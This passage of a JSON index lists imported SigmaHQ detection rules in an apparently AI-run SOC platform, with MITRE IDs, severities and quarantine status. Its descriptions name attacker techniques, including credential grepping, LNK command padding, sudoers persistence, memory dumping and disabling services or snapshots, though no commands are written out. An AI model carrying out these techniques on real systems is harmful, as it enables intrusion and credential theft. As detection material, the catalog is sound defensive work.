"dd3ee8cc-f751-41c9-ba53-5a32ed47e563", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_registry_modification_of_ms_setting_protocol_handler.yml" } }, { "id": "sigmahq-sigma-dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "type": "detection", "name": "Use NTFS Short Name in Command Line", "description": "Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-ntfs-short-name-in-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml" } }, { "id": "sigmahq-sigma-dd80db93-6ec2-4f4c-a017-ad40da6ffe81", "type": "detection", "name": "Windows Defender Real-Time Protection Failure/Restart", "description": "Detects issues with Windows Defender Real-Time Protection features", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": 
"detections/sigma-imports/endpoint/windows-defender-real-time-protection-failure-restart.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd80db93-6ec2-4f4c-a017-ad40da6ffe81", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml" } }, { "id": "sigmahq-sigma-dd857d3e-0c6e-457b-9b48-e82ae7f86bd7", "type": "detection", "name": "New Module Module Added To IIS Server", "description": "Detects the addition of a new module to an IIS server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-module-module-added-to-iis-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd857d3e-0c6e-457b-9b48-e82ae7f86bd7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/iis-configuration/win_iis_module_added.yml" } }, { "id": "sigmahq-sigma-dd8756e7-a3a0-4768-b47e-8f545d1a751c", "type": "detection", "name": "Suspicious LNK Command-Line Padding with Whitespace Characters", "description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return 
\\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-lnk-command-line-padding-with-whitespace-characters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd8756e7-a3a0-4768-b47e-8f545d1a751c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_lnk_exec_hidden_cmd.yml" } }, { "id": "sigmahq-sigma-ddb26b76-4447-4807-871f-1b035b2bfa5d", "type": "detection", "name": "Persistence Via Sudoers.d Files", "description": "Detects the creation or modification of files within the \"sudoers.d\" directory on Linux systems.\nSuch activity may indicate an attempt to establish or maintain privilege escalation by granting specific users elevated permissions.\nUnauthorized changes to sudoers files are a common technique used by attackers to persist administrative access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/persistence-via-sudoers-d-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddb26b76-4447-4807-871f-1b035b2bfa5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml" } }, { "id": "sigmahq-sigma-ddbbe845-1d74-43a8-8231-2156d180234d", "type": "detection", "name": "FortiGate - New Local User Created", "description": "Detects the creation of a new local user on a Fortinet FortiGate Firewall.\nThe new local user could be used for VPN connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-new-local-user-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddbbe845-1d74-43a8-8231-2156d180234d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_local_user_created.yml" } }, { "id": "sigmahq-sigma-ddcd88cb-7f62-4ce5-86f9-1704190feb0a", "type": "detection", "name": "Potential In-Memory Execution Using Reflection.Assembly", "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1620" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-in-memory-execution-using-reflection-assembly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml" } }, { "id": "sigmahq-sigma-ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "type": "detection", "name": "Potential Persistence Via Outlook Home Page", "description": "Detects potential persistence activity via outlook home page.\nAn attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-outlook-home-page.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml" } }, { "id": "sigmahq-sigma-dddfebae-c46f-439c-af7a-fdb6bde90218", "type": "detection", "name": 
"SyncAppvPublishingServer Execution to Bypass Powershell Restriction", "description": "Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syncappvpublishingserver-execution-to-bypass-powershell-restriction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dddfebae-c46f-439c-af7a-fdb6bde90218", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" } }, { "id": "sigmahq-sigma-dde85b37-40cd-4a94-b00c-0b8794f956b5", "type": "detection", "name": "Remote Task Creation via ATSVC Named Pipe - Zeek", "description": "Detects remote task creation via at.exe or API interacting with the ATSVC named pipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-task-creation-via-atsvc-named-pipe-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dde85b37-40cd-4a94-b00c-0b8794f956b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" } }, { "id": "sigmahq-sigma-ddeff553-5233-4ae9-bbab-d64d2bd634be", "type": "detection", "name": "Data Copied To Clipboard Via Clip.EXE", "description": "Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-copied-to-clipboard-via-clip-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_clip_execution.yml" } }, { "id": "sigmahq-sigma-ddf36b67-e872-4507-ab2e-46bda21b842c", "type": "detection", "name": "Local System Accounts Discovery - MacOs", "description": "Detects enumeration of local system accounts on MacOS", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-system-accounts-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "ddf36b67-e872-4507-ab2e-46bda21b842c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_local_account.yml" } }, { "id": "sigmahq-sigma-de16d92c-c446-4d53-8938-10aeef41c8b6", "type": "detection", "name": "Computer Password Change Via Ksetup.EXE", "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/computer-password-change-via-ksetup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de16d92c-c446-4d53-8938-10aeef41c8b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml" } }, { "id": "sigmahq-sigma-de25eeb8-3655-4643-ac3a-b662d3f26b6b", "type": "detection", "name": "Disable Or Stop Services", "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services on Linux systems.\nAttackers may stop or disable security tools and services to evade detection, maintain persistence, or disrupt system operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1489" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-or-stop-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" } }, { "id": "sigmahq-sigma-de41232e-12e8-49fa-86bc-c05c7e722df9", "type": "detection", "name": "Suspicious PowerShell Download - PoshModule", "description": "Detects suspicious PowerShell download command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-download-poshmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" } }, { "id": "sigmahq-sigma-de46c52b-0bf8-4936-a327-aace94f94ac6", "type": "detection", "name": "Process Explorer Driver Creation By Non-Sysinternals Binary", "description": "Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.\nHack tools or malware may use the Process Explorer driver to elevate privileges, drops 
it to disk for a few moments, runs a service using that driver and removes it afterwards.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-explorer-driver-creation-by-non-sysinternals-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de46c52b-0bf8-4936-a327-aace94f94ac6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml" } }, { "id": "sigmahq-sigma-de587dce-915e-4218-aac4-835ca6af6f70", "type": "detection", "name": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-attempt-via-run-keys-using-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de587dce-915e-4218-aac4-835ca6af6f70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" } }, { "id": "sigmahq-sigma-de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "type": "detection", "name": "PAExec Service Installation", "description": "Detects PAExec service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/paexec-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_paexec.yml" } }, { "id": "sigmahq-sigma-deb9b646-a508-44ee-b7c9-d8965921c6b6", "type": "detection", "name": "Powershell Token Obfuscation - Process Creation", "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-token-obfuscation-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml" } }, { "id": "sigmahq-sigma-ded2b07a-d12f-4284-9b76-653e37b6c8b0", "type": "detection", "name": "Potentially Suspicious Ping/Copy Command Combination", "description": "Detects uncommon and potentially suspicious one-liner command containing both \"ping\" and \"copy\" at the same time, which is usually used by malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-ping-copy-command-combination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ded2b07a-d12f-4284-9b76-653e37b6c8b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml" } }, { "id": "sigmahq-sigma-dee0a7a3-f200-4112-a99b-952196d81e42", "type": "detection", "name": "DumpMinitool Execution", "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dumpminitool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dee0a7a3-f200-4112-a99b-952196d81e42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml" } }, { "id": "sigmahq-sigma-dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "type": "detection", "name": "Disabled Volume Snapshots", "description": "Detects commands that temporarily turn off Volume Snapshots", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabled-volume-snapshots.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml" } }, { "id": "sigmahq-sigma-def8b624-e08f-4ae1-8612-1ba21190da6b", "type": "detection", "name": "Outgoing Logon with New Credentials", "description": "Detects logon events that specify new credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outgoing-logon-with-new-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "def8b624-e08f-4ae1-8612-1ba21190da6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml" } }, { "id": "sigmahq-sigma-df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "type": "detection", "name": "Node Process Executions", "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/node-process-executions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml" } }, { "id": "sigmahq-sigma-df3fcaea-2715-4214-99c5-0056ea59eb35", "type": "detection", "name": "Credentials In Files - Linux", "description": "Detecting attempts to extract passwords with grep", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/credentials-in-files-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df3fcaea-2715-4214-99c5-0056ea59eb35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_find_cred_in_files.yml" } }, { "id": "sigmahq-sigma-df4dc653-1029-47ba-8231-3c44238cc0ae", "type": "detection", "name": "Potential Persistence Using DebugPath", "description": "Detects potential persistence using Appx DebugPath", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-using-debugpath.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df4dc653-1029-47ba-8231-3c44238cc0ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" } }, { "id": "sigmahq-sigma-df55196f-f105-44d3-a675-e9dfb6cc2f2b", "type": "detection", "name": "Renamed AdFind Execution", "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used for domain trust discovery to plan out subsequent steps in the attack chain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1087.002", "T1482", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-adfind-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_adfind.yml" } }, { "id": "sigmahq-sigma-df68f791-ad95-447f-a271-640a0dab9cf8", "type": "detection", "name": "DNS Query Request To OneLaunch Update Service", "description": "Detects DNS query requests to \"update.onelaunch.com\". 
This domain is associated with the OneLaunch adware application.\nWhen the OneLaunch application is installed it will attempt to get updates from this domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1056" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-request-to-onelaunch-update-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df68f791-ad95-447f-a271-640a0dab9cf8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml" } }, { "id": "sigmahq-sigma-df69cb1d-b891-4cd9-90c7-d617d90100ce", "type": "detection", "name": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. 
This technique is often used as a method to load malicious content into memory afterward.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1132.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-frombase64string-usage-on-gzip-archive-ps-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml" } }, { "id": "sigmahq-sigma-df6ecb8b-7822-4f4b-b412-08f524b4576c", "type": "detection", "name": "Creation Of Non-Existent System DLL", "description": "Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.\nPhantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.\nThus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-non-existent-system-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
